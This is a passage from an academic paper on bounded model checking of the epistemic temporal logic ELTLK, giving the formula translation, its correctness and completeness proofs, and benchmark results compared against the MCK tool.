\(A\) such that \(\bigcup _{j=0}^{n} B_j = A,\,|B_0| = \ldots = |B_{n-1}|,\,|B_{n}| = d\), and \(B_i \prec B_j\) for every \(0 \;{\,\leqslant \,}\; i < j {\,\leqslant \,}n\). Now let \({{h}_{k}^{\mathrm{U}}}(A, d)\) := \(hp(A, d, k)\) and \({{h}_{k}^{\mathrm{R}}}(A,d)\) := \(hp(A,d,k+1)\). Note that if \({{h}_{k}^{\mathrm{U}}}(A, d) = (B_0, \ldots , B_{k})\), then \({{h}_{k}^{\mathrm{U}}}(A, d)(j)\) denotes the set \(B_j\), for every \(0 {\,\leqslant \,}j {\,\leqslant \,}k\). Similarly, if \({{h}_{k}^{\mathrm{R}}}(A, d) = (B_0, \ldots , B_{k+1})\), then \({{h}_{k}^{\mathrm{R}}}(A, d)(j)\) denotes the set \(B_j\), for every \(0 \leqslant j \leqslant k + 1\). For example, if \(A \!=\! \{1,2,3,4,5,6\}\), then \(h_3^{\mathrm{U}}(A, 0) \!=\! (\{1,2\},\{3,4\},\{5,6\},\emptyset ),\,h_3^{\mathrm{U}}(A, 3) = (\{1\},\{2\},\{3\},\{4,5,6\}),\,h_3^{\mathrm{U}}(A, 6) = (\emptyset ,\emptyset , \emptyset ,\{1,2,3,4,5,6\}),\,h_3^{\mathrm{U}}(A, d)\) is undefined for \(d \in \{0,\ldots ,7\} \setminus \{0, 3,6\}\). Next, \(h_4^{\mathrm{R}}(A, 2) = (\{1\},\{2\},\{3\},\{4\},\{5,6\}),\,h_4^{\mathrm{R}}(A, 6) = (\emptyset ,\emptyset , \emptyset ,\emptyset ,\{1,2,3,4,5,6\})\), and \(h_4^{\mathrm{R}}(A, d)\) is undefined for \(d \in \{0,\ldots ,7\} \setminus \{2,6\}\). The functions \(g_l\) and \(g_r\) are used in the translation of the formulae with the main connective being either conjunction or disjunction: for a given ELTLK formula \(\varphi \wedge \psi \), if the set \(A\) is used to translate this formula, then the set \(g_l(A, f_k(\varphi ))\) is used to translate the subformula \(\varphi \) and the set \(g_r(A, f_k(\psi ))\) is used to translate the subformula \(\psi \); for a given ELTLK formula \(\varphi \vee \psi \), if the set \(A\) is used to translate this formula, then the set \(g_l(A, f_k(\varphi ))\) is used to translate the subformula \(\varphi \) and the set \(g_l(A, f_k(\psi ))\) is used to translate the subformula \(\psi \). The function \(g_{s}\) is used in the translation of the formulae with the main connective \(\mathrm{{Q}}\in \{{\overline{\mathrm{{K}}}}_{{ c}},{\overline{\mathrm{{D}}}}_{\varGamma },{\overline{\mathrm{E}}}_{\varGamma }\}\): for a given ELTLK formula \(\mathrm{{Q}}\varphi \), if the set \(A\) is to be used to translate this formula, then the path of the number \(min(A)\) is used to translate the operator \(\mathrm{{Q}}\) and the set \(g_{s}(A)\) is used to translate the subformula \(\varphi \). The function \({{h}_{k}^{\mathrm{U}}}\) is used in the translation of subformulae of the form \(\varphi \mathrm{U}\psi \): if the set \(A\) is to be used to translate the subformula \(\varphi \mathrm{U}\psi \) at the symbolic \(k\)-path \({\varvec{\pi }}_n\) (with the starting point \(m\)), then for every \(j\) such that \(m {\,\leqslant \,}j {\,\leqslant \,}k\), the set \({{h}_{k}^{\mathrm{U}}}(A, f_k(\psi ))(k)\) is used to translate the formula \(\psi \) along the symbolic path \({\varvec{\pi }}_n\) with starting point \(j\); moreover, for every \(i\) such that \(m {\,\leqslant \,}i < j\), the set \({{h}_{k}^{\mathrm{U}}}(A, f_k(\psi ))(i)\) is used to translate the formula \(\varphi \) along the symbolic path \({\varvec{\pi }}_n\) with starting point \(i\). Notice that if \(k\) does not divide \(|A| - d\), then \({{h}_{k}^{\mathrm{U}}}(A, d)\) is undefined. However, for every set \(A\) such that \(|A| = f_k(\varphi \mathrm{U}\psi )\), it is clear from the definition of \(f_k\) that \(k\) divides \(|A| - f_k(\psi )\). The function \({{h}_{k}^{\mathrm{R}}}\) is used in the translation of subformulae of the form \(\varphi \mathrm{R}\psi \): if the set \(A\) is used to translate the subformula \(\varphi \mathrm{R}\psi \) along a symbolic \(k\)-path \({\varvec{\pi }}_n\) (with the starting point \(m\)), then for every \(j\) such that \(m {\,\leqslant \,}j {\,\leqslant \,}k\), the set \({{h}_{k}^{\mathrm{R}}}(A, f_k(\varphi ))(k+1)\) is used to translate the formula \(\varphi \) along the symbolic paths \({\varvec{\pi }}_n\) with starting point \(j\); moreover, for every \(i\) such that \(m {\,\leqslant \,}i {\,\leqslant \,}j\), the set \({{h}_{k}^{\mathrm{R}}}(A,f_k(\varphi ))(i)\) is used to translate the formula \(\psi \) along the symbolic path \({\varvec{\pi }}_n\) with starting point \(i\). Notice that if \(k + 1\) does not divide \(|A| - 1\), then \({{h}_{k}^{\mathrm{R}}}(A, p)\) is undefined. However, for every set \(A\) such that \(|A| = f_k(\varphi \mathrm{R}\psi )\), it is clear from the definition of \(f_k\) that \(k + 1\) divides \(|A| - f_k(\varphi )\). Definition 5 (Translation of the ELTLK formulae) Let \(M\) be a model, \(\varphi \) an ELTLK formula, and \(k {\,\geqslant \,}0\) a bound. We define inductively the translation of \(\varphi \) over a path number \(n \in F_k(\varphi )\) starting at the symbolic state \(w_{m,n}\) as shown below, where \(n'=min(A),\,{{h}_{k}^{\mathrm{U}}}={{h}_{k}^{\mathrm{U}}}(A,f_k(\psi _2))\), and \({{h}_{k}^{\mathrm{R}}}={{h}_{k}^{\mathrm{R}}}(A,f_k(\psi _1))\). We assume that \({\mathcal{L }}_k^l({\varvec{\pi }}_n) :{=} {\mathcal{B }}_l^{=}(u_n)\wedge H(w_{k,n}, w_{l,n})\). $$\begin{aligned} \begin{array}{lll} {[{{true}}]}^{[m,n,A]}_{k} &{}:{=}&{} {{true}},\\ {[{false}]}^{[m,n,A]}_{k} &{}:{=}&{} {false},\\ {[p]}^{[m,n,A]}_{k} &{}:{=}&{} p(w_{m,n}),\\ {[\lnot p]}^{[m,n,A]}_{k} &{}:{=}&{} \lnot p(w_{m,n}),\\ {[\psi _1 \wedge \psi _2 ]}^{[m,n,A]}_{k} &{}:{=}&{} {[\psi _1]}^{[m,n,g_l(A, f_k(\psi _1))]}_{k} \wedge {[\psi _2]}^{[m,n,g_r(A, f_k(\psi _2))]}_{k},\\ {[\psi _1 \vee \psi _2 ]}^{[m,n,A]}_{k} &{}:{=}&{} {[\psi _1]}^{[m,n,g_l(A, f_k(\psi _1))]}_{k}\vee {[\psi _2]}^{[m,n,g_l(A, f_k(\psi _2))]}_{k},\\ {[\mathrm{X}\psi ]}^{[m,n,A]}_{k} &{}:{=}&{} {\left\{ \begin{array}{ll} [\psi ]^{[m+1,n,A]}_{k}, &{} \text { if } m < k \\ \bigvee \nolimits _{l=0}^{k-1}({\mathcal{L }}_{k}^{l}({\varvec{\pi }}_{n})\wedge [\psi ]^{[l+1,n,A]}_{k}), &{} \text { if } m = k\\ \end{array}\right. } \\ {[\psi _1 \mathrm{U}\psi _2]}^{[m,n,A]}_{k} &{}:{=}&{} \bigvee \nolimits _{j=m}^{k}([\psi _2]^{[j,n,{{h}_{k}^{\mathrm{U}}}(k)]}_{k} \wedge \bigwedge \nolimits _{i=m}^{j-1}[\psi _1]^{[i,n,{{h}_{k}^{\mathrm{U}}}(i)]}_{k})\\ &{}&{} \vee (\bigvee \nolimits _{l=0}^{m-1}({\mathcal{L }}_{k}^l({\varvec{\pi }}_{n}))\wedge \bigvee \nolimits _{j=0}^{m-1} ({\mathcal{B }}_j^{>}(u_n) \wedge [\psi _2]^{[j,n,{{h}_{k}^{\mathrm{U}}}(k)]}_{k}\\ &{}&{}\wedge \bigwedge \nolimits _{i=0}^{j-1}({\mathcal{B }}_i^{>}(u_{n}) \rightarrow [\psi _1]^{[i,n,{{h}_{k}^{\mathrm{U}}}(i)]}_{k})\wedge \bigwedge \nolimits _{i=m}^{k}[\psi _1]^{[i,n,{{h}_{k}^{\mathrm{U}}}(i)]}_{k})),\\ {[\psi _1 \mathrm{R}\psi _2)]}^{[m,n,A]}_{k} &{}:{=}&{} \bigvee \nolimits _{j=m}^{k}([\psi _1]^{[j,n,{{h}_{k}^{\mathrm{R}}}(k+1)]}_{k} \wedge \bigwedge \nolimits _{i=m}^{j}[\psi _2]^{[i,n,{{h}_{k}^{\mathrm{R}}}(i)]}_{k})\\ &{}&{} \vee (\bigvee \nolimits _{l=0}^{m-1}({\mathcal{L }}_{k}^l({\varvec{\pi }}_{n}))\wedge \bigvee \nolimits _{j=0}^{m} ({\mathcal{B }}_j^{>}(u_n) \wedge [\psi _1]^{[j,n,{{h}_{k}^{\mathrm{R}}}(k+1)]}_{k}\\ &{}&{} \wedge \bigwedge \nolimits _{i=0}^{j-1}({\mathcal{B }}_i^{>}(u_{n}) \rightarrow [\psi _2]^{[i,n,{{h}_{k}^{\mathrm{R}}}(i)]}_{k}) \wedge \bigwedge \nolimits _{i=m}^{k}[\psi _2]^{[i,n,{{h}_{k}^{\mathrm{R}}}(i)]}_{k}))\\ &{}&{} \vee (\bigvee \nolimits _{l=0}^{k-1} ({\mathcal{L }}_{k}^{l}({\varvec{\pi }}_{n}))\wedge \bigwedge \nolimits _{j = 0}^{m-1}({\mathcal{B }}_j^{\geqslant }(u_{n}) \rightarrow [\psi _2]^{[j,n,{{h}_{k}^{\mathrm{R}}}(j)]}_{k})\\ &{}&{} \wedge \bigwedge \nolimits _{j = m}^{k} [\psi _2]^{[j,n,{{h}_{k}^{\mathrm{R}}}(j)]}_{k}),\\ {[{\overline{\mathrm{{K}}}}_{{ c}}\psi ]}^{[m,n,A]}_{k} &{}:{=}&{} I_{\iota }(w_{0,n'}) \wedge \bigvee \nolimits ^{k}_{j=0}([\psi ]^{[j,n',g_s(A)]}_{k} \wedge H_{{ c}}(w_{m,n},w_{j,n'})),\\ {[{\overline{\mathrm{{D}}}}_\varGamma \psi ]}^{[m,n,A]}_{k} &{}:{=}&{} I_{\iota }(w_{0, n'})\wedge \bigvee \nolimits _{j=0}^{k}([\psi ]^{[j,n',g_s(A)]}_{k} \wedge \bigwedge \nolimits _{{ c}\in \varGamma } H_{{ c}}(w_{m,n},w_{j,n'})),\\ {[{\overline{\mathrm{E}}}_\varGamma \psi ]}^{[m,n,A]}_{k} &{}:{=}&{} I_{\iota }(w_{0,n'}) \wedge \bigvee \nolimits _{j=0}^{k}([\psi ]^{[j,n',g_s(A)]}_{k} \wedge \bigvee \nolimits _{{ c}\in \varGamma } H_{{ c}}(w_{m,n},w_{j,n'})),\\ {[{\overline{\mathrm{{C}}}}_\varGamma \psi ]}^{[m,n,A]}_{k} &{}:{=}&{} [\bigvee \nolimits _{j=1}^{k} ({\overline{\mathrm{E}}}_\varGamma )^j\psi ]^{[m,n,A]}_k. \\ \end{array} \end{aligned}$$ For representing the propositional formula \([M,\varphi ]_{k}\) reduced Boolean circuits (RBC) [1] are used. An RBC represents subformulae of \([M,\varphi ]_{k}\) by fresh propositions such that each two identical subformulae correspond to the same proposition.1 Following van der Meyden at al. [23], instead of using RBCs, we could directly encode \([M,\varphi ]_{k}\) in such a way that each subformula \(\psi \) of \([M,\varphi ]_{k}\) occurring within the scope of a \(k\)-element disjunction or conjunction is replaced with a propositional variable \(p_{\psi }\) and the reduced formula \([M,\varphi ]_{k}\) is conjuncted with the implication \(p_{\psi } \Rightarrow \psi \). However, in this case our method, as the one proposed in [23], would not be complete. Nonetheless, the completeness can be achieved, by using \(p_{\psi } \Leftrightarrow \psi \) instead of \(p_{\psi } \Rightarrow \psi \). This however can give a formula of an exponential size during the transformation into clausal normal form. 2 Our encoding of the ELTLK formulae is defined recursively over the structure of an ELTLK formula \(\varphi \), over the current position \(n\) of the \(m\)-th symbolic \(k\)-path, and over the set \(A\) of symbolic k-paths, which is initially equal to \(F_k(\varphi )\). Next, our encoding does not translate looping and non-looping witnesses separately, but it combines both of them. Further, it is parameterised by the bound \(k\), the set of symbolic \(k\)-paths, and closely follows the bounded semantics of Def. 4. Therefore, for fixed \(n,\,m,\,k\) and \(A\), each subformula \(\psi \) of \(\varphi \) requires the constraints of size \(O(k\cdot f_k(\varphi ))\) using the encoding of \(\psi \) at various positions. Moreover, since the encoding of a subformula \(\psi \) is only dependent on \(m,\,n,\,k\), and \(A\), and, multiple occurrences of the encoding of \(\psi \) over the same set of parameters can be shared, the overall size can be bounded by \(O(|\varphi | \cdot k \cdot f_k(\varphi ))\). Further the size of the formula \([M,\varphi ]_k\) is bounded by \(O(|T|\cdot k \cdot f_k(\varphi ) + |\varphi | \cdot k \cdot f_k(\varphi ))\). 3.2.4 Correctness and completeness of the translation The lemmas below state the correctness and the completeness of the presented translation. Now, let \(\alpha \) be an ELTLK formula. For every ELTLK subformula \(\varphi \) of \(\alpha \), we denote by \([\varphi ]^{[\alpha ,m,n,A]}_{k}\) the propositional formula $$\begin{aligned}{}[M]_k^{F_k(\alpha )}\wedge [\varphi ]^{[m,n,A]}_{k} \end{aligned}$$ (6) where \([M]_k^{F_k(\alpha )}:{=} \bigwedge _{j\in F_k(\alpha )} \bigwedge ^{k-1}_{i=0} {\mathcal{R }}(w_{i,j}, w_{i+1,j}) \wedge \bigwedge _{j\in F_k(\alpha )} \bigvee _{l=0}^{k} B_l^{=}(u_{j})\). In the next two lemmas we use the following auxiliary notation. By \(V{\,\Vdash \,}\xi \) we mean that the valuation \(V\) satisfies the propositional formula \(\xi \). Moreover, we write \(g_{i,j}\) instead of \(\mathbf{S}(w_{i,j})\), and \(l_j\) instead of \(\mathbf{J}(u_j)\). Lemma 7 (Correctness of the translation) Let \(M\) be a model, \(\alpha \) an ELTLK formula, and \(k \in \mathrm{I\!N}\). For every subformula \(\varphi \) of the formula \(\alpha \), every \((m, n) \in \{0,\ldots ,k\} \times F_k(\alpha )\), every \(A\,\subseteq \,F_k(\alpha )\setminus \{n\}\) such that \(|A| = f_k(\varphi )\), and every valuation \(V\), the following condition holds: \(V {\,\Vdash \,}[\varphi ]^{[\alpha ,m,n,A]}_{k}\) implies \(M, ((g_{0,n},\ldots ,g_{k,n}), l_n)[m] \models _k \varphi \). Proof Let \(n \in F_k(\alpha ),\,A\) be a set such that \(A \subseteq F_k(\alpha ) \setminus \{n\}\) and \(|A| = f_k(\varphi ),\,m\) be a natural number such that \(0 \leqslant m \leqslant k,\,\rho _l\) denote the \(k\)-path \(((g_{0,n},\ldots ,g_{k,n}), l_n)\), and \(V\) a valuation. Suppose that \(V {\,\Vdash \,}[\varphi ]^{[\alpha ,m,n,A]}_{k}\) and consider the following cases: 1. 1. \(\varphi \in \{{{true}}, {false}\}\). The thesis of the lemma is obvious in this case.   2. 2. \(\varphi = p\), where \(p \in \mathcal{PV }\). Then, \(V {\,\Vdash \,}[p]^{[\alpha ,m,n,A]}_{k} \iff V {\,\Vdash \,}p(w_{m,n}) \iff p \in {\mathcal{V }}(g_{m,n}) \iff M,\rho _l[m] \models _k p\).   3. 3. \(\varphi = \lnot p\), where \(p \in \mathcal{PV }\). Then, \( V{\,\Vdash \,}[\lnot p]^{[\alpha ,m,n,A]}_{k} \iff V {\,\Vdash \,}\lnot p(w_{m,n}) \iff p \notin {\mathcal{V }}(g_{m,n}) \iff M,\rho _l[m] \models _k \lnot p\).   4. 4. \(\varphi = \psi _1 \wedge \psi _2\). Let \(B = g_l(A,f_k(\psi _1))\) and \(C = g_r(A,f_k(\psi _2))\). From \(V{\,\Vdash \,}[\psi _1 \wedge \psi _2]^{[\alpha ,m,n,A]}_k\), we get \(V {\,\Vdash \,}[\psi _1]^{[\alpha ,m,n,B]}_k\) and \(V {\,\Vdash \,}[\psi _2]^{[\alpha ,m,n,C]}_k\). By inductive hypotheses, \(M,\rho _l[m] \models _k \psi _1\) and \(M,\rho _l[m] \models _k \psi _2\). Thus \(M,\rho _l[m] \models _k \psi _1 \wedge \psi _2\).   5. 5. \(\varphi = \psi _1 \vee \psi _2\). Let \(B = g_l(A,f_k(\psi _1))\) and \(C = g_l(A,f_k(\psi _2))\). From \(V{\,\Vdash \,}[\psi _1 \vee \psi _2]^{[\alpha ,m,n,A]}_k\), we get \(V {\,\Vdash \,}[\psi _1]^{[\alpha ,m,n,B]}_k\) or \(V {\,\Vdash \,}[\psi _2]^{[\alpha ,m,n,C]}_k\). By inductive hypotheses, \(M,\rho _l[m] \models _k \psi _1\) or \(M,\rho _l[m] \models _k \psi _2\). Thus \(M,\rho _l[m] \models _k \psi _1 \vee \psi _2\).   6. 6. Let \(\varphi = \mathrm{X}\psi \mid \psi _1 \mathrm{U}\psi _2 \mid \psi _1 \mathrm{R}\psi _2\) with \(p\in \mathcal{PV }\). See Lemma 3.1. of [55].   7. 7. Let \(\varphi ={\overline{\mathrm{{K}}}}_{{ c}} \psi \). Let \(n' = \min (A)\), and \(\widetilde{\rho }_{l'}\) denote the \(k\)-path \(((g_{0,n'},\ldots ,g_{k,n'}), l_{n'})\). By the definition of the translation we have that \(V {\,\Vdash \,}[{\overline{\mathrm{{K}}}}_{{ c}} \psi ]^{[\alpha ,m,n,A]}_{k}\) implies \(V {\,\Vdash \,}I_{\iota }(w_{0,n'}) \wedge \bigvee ^{k}_{j=0}([\psi ]^{[\alpha ,j,n',g_s(A)]}_{k} \wedge H_{{ c}}(w_{m,n},w_{j,n'}))\). Since \(V {\,\Vdash \,}H_{{ c}}(w_{m,n},w_{j,n'})\) we have \(g_{m,n} \sim _{{ c}} g'_{j,n'}\), for some \(j \in \{0,\ldots ,k\}\). Therefore, by inductive hypotheses we get \((\exists 0 {\,\leqslant \,}j {\,\leqslant \,}k) (M,\widetilde{\rho }_{l'}[j] \models _k \psi \) and \(g_{m,n} \sim _{{ c}} g'_{j,n'})\). Thus we have \(M, ((g_{0,n},\ldots ,g_{k,n}), l_n)[m] \models _k {\overline{\mathrm{{K}}}}_{{ c}} \psi \).   8. 8. Let \(\varphi =\overline{Y}_{\varGamma }\psi \), where \(Y \in \{ \mathrm{{D}},\mathrm{E},\mathrm{{C}}\}\). These cases can be proven analogously to the case 7.   Let \(B\) and \(C\) be two finite sets of indices. Then, by \(Var(B)\) we denote the set of all the state variables appearing in all the symbolic states of all the symbolic \(k\)-paths whose indices are taken from the set \(B\). Moreover, for every valuation \(V\) and every set of indices \(B\), by \(V\!\uparrow \!B\) we denote the restriction of the valuation \(V\) to the set \(Var(B)\). Notice that if \(B \cap C = \emptyset \), then \(Var(B) \cap Var(C) = \emptyset \). This property is used in the proof of the following lemma. Lemma 8 (Completeness of the translation) Let \(M\) be a model, \(k \in \mathrm{I\!N}\), and \(\alpha \) an ELTLK formula such that \(f_k(\mathrm{E}\alpha ) > 0\). For every subformula \(\varphi \) of the formula \(\alpha \), every \((m, n) \in \{(0, 0)\} \cup \{0,\ldots ,k\} \times F_k(\alpha )\), every \(A\,\subseteq \,F_k(\alpha )\setminus \{n\}\) such that \(|A| = f_k(\varphi )\), and every \(k\)-path \(\rho _l\), the following condition holds: \(M, \rho _l[m] \models _k \varphi \) implies that there exists a valuation \(V\) such that \(\rho _l = ((g_{0,n},\ldots ,g_{k,n}), l_n)\) and \(V {\,\Vdash \,}[\varphi ]^{[\alpha ,m,n,A]}_{k}\). Proof First, note that given an ELTLK formula \(\alpha \), and natural numbers \(k,\,m,\,n\) with \(0 \leqslant m \leqslant k\) and \(n \in F_k(\alpha )\), there exists a valuation \(V\) such \(V{\,\Vdash \,}[M]_k^{F_k(\alpha )}\). This is because \(M\) has no terminal states. Now we proceed by induction on the complexity of \(\varphi \). Let \(n \in F_k(\alpha ),\,A\) be a set such that \(A \subseteq F_k(\alpha ) \setminus \{n\}\) and \(|A| = f_k(\varphi ),\,\rho _l\) be a \(k\)-path in \(M\), and \(m\) be a natural number such that \(0 \leqslant m \leqslant k\). Suppose that \(M,\rho _l[m] \models _k \varphi \) and consider the following cases: 1. 1. Let \(\varphi =p \mid \lnot p\mid \psi _1 \vee \psi _2 \mid \psi _1 \wedge \psi _2 \mid \mathrm{X}\psi \mid \psi _1 \mathrm{U}\psi _2 \mid \psi _1 \mathrm{R}\psi _2\) with \(p\in \mathcal{PV }\). See the proof of Lemma 3.3. of [55].   2. 2. Let \(\varphi ={\overline{\mathrm{{K}}}}_{{ c}} \psi \). Since \(M,\rho _l[m] \models _k {\overline{\mathrm{{K}}}}_{{ c}}\psi \), we have that \((\exists \rho '_{l'} \in {\varPi _k}(\iota )) (\exists {0 {\,\leqslant \,}j {\,\leqslant \,}k})\)\((M, \rho '_{l'}[j] \models _k \psi \)) and \(\rho (m) \sim _{{ c}} \rho '(j))\). Let \(n' = \min (A)\) and \(B = g_s(A)\). By the inductive hypothesis and the definition of the formula \(H_{{ c}}\), there exists a valuation \(V'\) such that \(V' {\,\Vdash \,}[M]_k^{F_k(\alpha )}\) and \(V' {\,\Vdash \,}[\psi ]^{[j,n',B]}_k \wedge H_{{ c}}(w_{m,n},w_{j,n'})\) for some \(j \in \{0,\ldots ,k\}\). Hence we have \(V' {\,\Vdash \,}\bigvee ^{k}_{j=0}([\psi ]^{[j,n',B]}_k \wedge H_{{ c}}(w_{m,n},w_{j,n'}))\). Further, since \(\rho '_{l'} \in {\varPi _k}(\iota ),\,\rho '_{l'}(0)=\iota \). Thus, by the definition of the formula \(I\), we get that \(V' {\,\Vdash \,}I_{\iota }(w_{0,n'})\). Therefore we have \(V' {\,\Vdash \,}I_{\iota }(w_{0,n'}) \wedge \bigvee ^{k}_{j=0}([\psi ]^{[j,n',B]}_k \wedge H_{{ c}}(w_{m,n},w_{j,n'}))\), which implies that \(V' {\,\Vdash \,}{[{\overline{\mathrm{{K}}}}_{{ c}}\psi ]}^{[m,n,A]}_{k}\). Since \(n' \notin B\) and \(n \notin A\), there exists a valuation \(V\) such that \(V\!\uparrow \!B = V'\!\uparrow \!B\) and moreover \(V {\,\Vdash \,}[M]_k^{F_k(\alpha )}\) and \(V {\,\Vdash \,}{[{\overline{\mathrm{{K}}}}_{{ c}}\psi ]}^{[m,n,A]}_{k}\). Therefore we get \(V {\,\Vdash \,}[{\overline{\mathrm{{K}}}}_{{ c}}\psi ]^{[\alpha ,m,n,A]}_k\).   3. 3. Let \(\varphi =\overline{Y}_{\varGamma }\psi \), where \(Y \in \{ \mathrm{{D}},\mathrm{E},\mathrm{{C}}\}\). These cases can be proven analogously to the case 2.   The correctness of the SAT-based translation scheme for ELTLK is guaranteed by the following theorem. Theorem 2 Let \(M\) be a model, and \(\varphi \) an ELTLK formula. Then for every \(k \in \mathrm{I\!N},\,M \models ^{\exists }_k \varphi \) if, and only if, the propositional formula \([M,\varphi ]_{k}\) is satisfiable. Proof \((\Longrightarrow )\) Let \(k \in \mathrm{I\!N}\) and \(M, \rho _l \models _k \varphi \) for some \(\rho _l \in \varPi _k(\iota )\). By Lemma 8 it follows that there exists a valuation \(V\) such that \(\rho _l = ((g_{0,0},\ldots ,g_{k,0}), l_0)\) with \({\mathbf{S}}(w_{0,0}) = g_{0,0}=\iota \) and \(V {\,\Vdash \,}[\varphi ]^{[\varphi ,0,0,F_k(\varphi )]}_{k}\). Hence, \(V {\,\Vdash \,}I(w_{0,0})\wedge [M]_{k}^{F_k(\varphi )} \wedge {[\varphi ]}^{[0,0,F_k(\varphi )]}_{k}\). Thus \(V{\,\Vdash \,}[M^{\varphi ,\iota }]_k\). \((\Longleftarrow )\) Let \(k \in \mathrm{I\!N}\) and \([M^{\varphi ,\iota }]_k\) be satisfiable. It means that there exists a valuation \(V\) such that \(V{\,\Vdash \,}[M^{\varphi ,\iota }]_k\). So, \(V{\,\Vdash \,}I(w_{0,0})\) and \(V{\,\Vdash \,}[M]_k^{F_k(\varphi )} \wedge {[\varphi ]}^{[0,0,F_k(\varphi )]}_{k}\). Hence, by Lemma 7 it follows that \(M, ((g_{0,0},\ldots ,g_{k,0}), l_0) \models _k \varphi \) and \({\mathbf{S}}(w_{0,0}) = g_{0,0} = \iota \). Thus \(M \models ^{\exists }_k \varphi \). 4 Experimental results In this section we experimentally evaluate the performance of our four different BMC encodings: two SAT-based BMC (over the IIS and IS semantics) and two BDD-based BMC (over the IIS and IS semantics), all implemented as extensions of our tool Verics [28], so the inputs to the four algorithms are the same. We compare our experimental results with these of the MCK tool (version 0.5.1),3 the only existing tool that is suitable with respect to the input formalism (i.e., interpreted systems) and checked properties (i.e., ELTLK). We have done our best to compare our BMC approaches and the SAT-based BMC module of MCK on the same models. We would like to point out that the manual for MCK states that the tool supports SAT-based BMC for \(\mathrm{ECTL}^{*}\mathrm{K}\) (i.e., \(\mathrm{ECTL}^{*}\) augmented to include epistemic components). Unfortunately, no theory behind this implementation has ever been published. We are aware of the paper [23], which describes SAT-based BMC for ECTLK, but it does not discuss how this approach can be extended to \(\mathrm{ECTL}^{*}\mathrm{K}\). Therefore, we are unable to compare our SAT-based BMC algorithms for ELTLK with the one for \(\mathrm{ECTL}^{*}\mathrm{K}\) implemented in MCK. We have conducted the experiments using two classical multi-agent protocols: the (faulty) train controller system and the dining cryptographers protocol, and one benchmark that is not yet so popular in the multi-agent community, i.e., the (faulty) generic pipeline paradigm. However, we would like to point out that (F)GPP is a very useful and scalable example, which has a potential to become a standard benchmark in this community. Further, we specify each property for the considered benchmarks in the universal form by an LTLK formula, for which we verify the corresponding counterexample formula, i.e., the negated universal formula in ELTLK which is interpreted existentially. Moreover, for every specification given, there exists a counterexample, i.e., the ELTLK formula specifying the counterexample holds in the model of the benchmark. We have computed our experimental results on a computer with Intel Xeon 2 GHz processor and 4 GB of RAM, running Linux 2.6, with the default limits of 2 GB of memory and 2000 seconds. Moreover, similarly to the MCK tool, we used PicoSAT [2] to test the satisfiability of the propositional formulae generated by our SAT-based BMC encodings. Our SAT-based implementation uses PicoSAT in version 957. The implementation of the BDD-based method employs the CUDD 2.5.0 [44] library for operations on BDDs. The first benchmark we have considered is the faulty train controller system (FTC) – see Sect. 2.4 for the description of the model. This system is scaled according to the number of trains (agents), i.e., the problem parameter \(n\) is the number of trains. The specifications (universal formulae) we consider are as follows: • \(\varphi _1\) = \(\mathrm{G}(InTunnel_1 \rightarrow \mathrm{{K}}_{Train_1} (\bigwedge _{i=2}^n \lnot InTunnel_i) )\) – it expresses that whenever train one is in the tunnel, it knows that no other train is in the tunnel, • \(\varphi _2\) = \(\mathrm{G}(\mathrm{{K}}_{Train_1}\bigwedge _{i=1,j=2, i<j}^n \)\(\lnot (InTunnel_i \wedge InTunnel_j))\) – it represents that the trains are aware of the mutually exclusive access to the tunnel. The size of the reachable state space of the FTC system is \(3\cdot (n+1)\cdot 2^{n-2}\), for \(n{\,\geqslant \,}2\). The sizes of the counterexamples for the above formulae, and for all our BMC methods, as well as for MCK are shown in Table 3. We would like to point out that in the case of the SAT-based BMC by size we mean the length of the \(k\)-path in the counterexample (i.e., the value \(k\)) multiplied by the number of \(k\)-paths (i.e., the value of the function \(\widehat{f}_k\)). In the case of the BDD-based BMC by size we mean the number of full iterations needed to find the counterexample. In Tables 3, 4, 5 we denote by IS-k and IIS-k, respectively, the minimal value of the bound in BMC that yields a counterexample for the IS and IIS semantics. Table 3 The FTC system with \(n\) trains   Verics, SAT-BMC Verics, BDD-BMC MCK, SAT-BMC Formula IS-k IIS-k \(\widehat{f}_k\) IS-k IIS-k IS \(\varphi _1\) 2 4 2 2 4 3 \(\varphi _2\) 2 4 2 2 4 3 Table 4 The FGPP system with \(n\) nodes   Verics, SAT-BMC Verics, BDD-BMC MCK, SAT-BMC Formula IS-k IIS-k \(\widehat{f}_k\) IS-k IIS-k IS \(\varphi _1\) \(2n+2\) \(2n+2\) 3 \(2n+2\) \(2n+2\) \(6n+4\) \(\varphi _2\) \(2n+2\) \(2n+4\) 1 \(2n+1\) \(2n+3\) \(6n-1\) \(\varphi _3\) 4 6 1 3 5 8 \(\varphi _4\) 4 6 2 3 5 5 Table 5 The DC system with \(n\) cryptographers   Verics, SAT-BMC Verics, BDD-BMC MCK, SAT-BMC Formula IS-k IIS-k \(\widehat{f}_k\) IS-k IIS-k IS \(\varphi _1\) \(n+4\) \(4n+1\) \(n\) \(n+4\) \(4n+1\) 7 \(\varphi _2\) 0 0 2 2 \(4n+1\) 1 \(\varphi _3\) \(n+4\) \(4n+1\) \(n+1\) \(n+4\) \(4n+1\) 7 The second benchmark we have considered is the faulty generic pipeline paradigm (FGPP)—see Sect. 2.4 for the description of the model. This system is scaled according to the number of its Nodes (agents), i.e., the problem parameter \(n\) is the number of Nodes. The specifications (universal formulae) we consider are as follows: • \(\varphi _1\) = \(\mathrm{G}(ProdSend \rightarrow \mathrm{{K}}_{C} \mathrm{{K}}_{P} ConsReady)\)—it states that if Producer produces a commodity, then Consumer knows that Producer knows that Consumer has not received the commodity. • \(\varphi _2\) = \(\mathrm{G}(Problem_n \rightarrow (\mathrm{F}Repair_n \vee \mathrm{G}Alarm_nSend ))\)—it expresses that each time a problem occurs at node \(n\), then either it is repaired, or the alarm of node \(n\) is enabled. • \(\varphi _3\) = \(\bigwedge _{i=1}^n\mathrm{G}(Problem_i \rightarrow (\mathrm{F}Repair_i \vee \mathrm{G}Alarm_iSend ))\)—it expresses that each time a problem occurs at a node, then either it is repaired or the alarm is on. • \(\varphi _4\) = \(\bigwedge _{i=1}^n\mathrm{G}\mathrm{{K}}_{P}(Problem_i \rightarrow (\mathrm{F}Repair_i \vee \mathrm{G}Alarm_iSend))\)—it expresses that Producer knows that each time a problem occurs at a node, then either it is repaired or the alarm is on. The size of the reachable state space of the FGPP system is \(4\cdot 3^{2n}\), for \(n{\,\geqslant \,}1\). The sizes of the counterexamples for the above formulae, and for all our BMC methods, as well as for MCK are shown in Table 4. The third benchmark we have considered is the dining cryptographers protocol (DC)—see Sect. 2.4 for the description of the model. This system is scaled according to the number of cryptographers, i.e., the problem parameter \(n\) is the number of cryptographers (together with the coins and the oracles). The specifications (universal formulae) we consider are as follows: • \(\varphi _1\) = 